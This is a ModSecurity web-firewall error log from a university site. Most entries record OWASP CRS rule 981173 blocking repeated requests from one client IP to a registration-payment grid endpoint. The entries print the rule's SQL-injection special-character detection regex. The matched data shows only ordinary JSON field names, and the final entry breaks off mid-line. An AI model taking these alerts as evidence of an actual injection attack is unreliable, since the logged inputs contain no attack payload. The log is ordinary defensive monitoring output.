[Tue Aug 29 09:38:16.152489 2023] [:error] [pid 63682] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aGMCo-f0AAPjC@jIAAAAd"]
[Tue Aug 29 09:38:17.003197 2023] [:error] [pid 63682] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aGMCo-f0AAPjC@jMAAAAd"]
[Tue Aug 29 09:38:18.713278 2023] [:error] [pid 63682] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aGsCo-f0AAPjC@jQAAAAd"]
[Tue Aug 29 09:38:37.465366 2023] [:error] [pid 63712] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:par_setuju. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within ARGS:par_setuju: 20222x55201x-x41155050160181x15500211012x-x553109x0x0x-xx;20222x55201x-x41155050160181x505212012x-x553109x0x0x-xx;20222x55201x82x41155050160181x505231423x551138x553109x0x0x-xx;20222x55201x82x41155050160181x505231431x551138x553109x0x0x-xx;20222x55201x-x41155050160181x505232083x-x553109x0x0x-xx;20222x55201x-x41155050160181xTIF21032x-x553109x0x0x-xx;20222x55201x-x41155050160181xTIF21082x-x553109x0x0x-xx;20222x55201x-x41155050160181xTIF2112x-x553109x0x0x-xx;20222..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_ [hostname "www.unla.ac.id"] [uri "/index.php/e_akademic/c_karturencanastudi/simpansetujusks"] [unique_id "ZO1aLcCo-f0AAPjgw30AAAAC"]
[Tue Aug 29 09:38:39.585228 2023] [:error] [pid 63714] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aL8Co-f0AAPjinbMAAAAF"]
[Tue Aug 29 09:38:42.564149 2023] [:error] [pid 63714] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aMsCo-f0AAPjinbQAAAAF"]
[Tue Aug 29 09:38:43.231444 2023] [:error] [pid 63714] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aM8Co-f0AAPjinbUAAAAF"]
[Tue Aug 29 09:38:43.738918 2023] [:error] [pid 63714] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aM8Co-f0AAPjinbYAAAAF"]
[Tue Aug 29 09:38:43.931784 2023] [:error] [pid 63714] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aM8Co-f0AAPjinbcAAAAF"]
[Tue Aug 29 09:38:44.123200 2023] [:error] [pid 63714] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aNMCo-f0AAPjinbgAAAAF"]
[Tue Aug 29 09:38:44.299516 2023] [:error] [pid 63714] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aNMCo-f0AAPjinbkAAAAF"]
[Tue Aug 29 09:38:44.465023 2023] [:error] [pid 63714] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aNMCo-f0AAPjinboAAAAF"]
[Tue Aug 29 09:38:44.627078 2023] [:error] [pid 63714] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aNMCo-f0AAPjinbsAAAAF"]
[Tue Aug 29 09:38:44.804430 2023] [:error] [pid 63714] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aNMCo-f0AAPjinbwAAAAF"]
[Tue Aug 29 09:38:44.971848 2023] [:error] [pid 63714] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aNMCo-f0AAPjinb0AAAAF"]
[Tue Aug 29 09:38:45.148122 2023] [:error] [pid 63714] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aNcCo-f0AAPjinb4AAAAF"]
[Tue Aug 29 09:38:45.332240 2023] [:error] [pid 63714] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aNcCo-f0AAPjinb8AAAAF"]
[Tue Aug 29 09:38:45.515663 2023] [:error] [pid 63714] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aNcCo-f0AAPjincAAAAAF"]
[Tue Aug 29 09:38:45.700416 2023] [:error] [pid 63714] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aNcCo-f0AAPjincEAAAAF"]
[Tue Aug 29 09:38:45.865860 2023] [:error] [pid 63714] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: 